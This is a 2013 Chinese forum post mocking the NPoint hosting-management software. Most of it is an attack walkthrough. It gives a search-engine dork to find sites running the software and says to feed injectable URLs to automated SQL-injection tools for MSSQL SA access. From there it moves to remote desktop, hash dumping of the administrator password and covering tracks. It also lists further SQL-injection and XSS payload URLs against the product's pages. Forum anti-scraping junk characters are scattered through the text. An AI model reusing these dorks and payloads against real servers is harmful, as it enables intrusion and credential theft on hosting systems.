不得不说N点实在是一个破东西
2 h' {$ q. c2 I6 k就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
" }) B: P) ]5 I% a好吧 抱怨一下就行了 接下来关键的时候到了1 `# X8 T6 m2 V) u4 r
首先百度搜索关键字:inurl: (mmdatabase.asp)
) f; e1 D5 D K我随便列举一个: www.xxxx.com! G6 \: G! l: n2 m' d
修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1* o% p9 E3 H- g; `/ [8 D* V
扔入NBSI 或者啊D等各种傻逼工具后
% D' I H; [9 r: b. {! [" T你们会看到是SA权限
! a# R) d% V* m果断3389 上去 hash得到administrator密码
0 N! r G" [, I; @4 v- q1 B擦屁股走人~; d- z2 V7 `. |) l
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
! ?4 v2 b* j7 e& D , [+ w+ B& [6 a
再附上其他几个漏洞页面
% j- t0 ^2 A2 e0 W* m- _( RSQL:
+ t# M a4 S5 M/ vhttp://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=19 E0 p( x$ i6 ]/ I; I
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
0 }: s8 E4 |2 j& A+ Yhttp://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
$ e0 Z- o5 \" g, z/ hhttp://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
5 \& u. R5 Q6 A4 C- x+ z$ WXSS证明:
. E9 g' N' l- K& k9 ]http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”$ ]/ G" m+ @4 s2 j: I# h& v1 C4 {$ j& t
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
4 \2 F6 _0 c/ P- H: s1 S# Phttp://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>. ]2 f2 {) X8 ]: j9 F; n
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜3 W& d5 k. p: h0 G+ _
还是星外吧 你们懂的
" c: n/ M- E# n$ \( @* l作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?; {1 L" ]6 Y9 d7 i$ u* x
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
' C5 P0 J/ w+ i9 u5 c% u8 `' q——- |
发表于 2013-3-3 08:06:44
收藏
支持
反对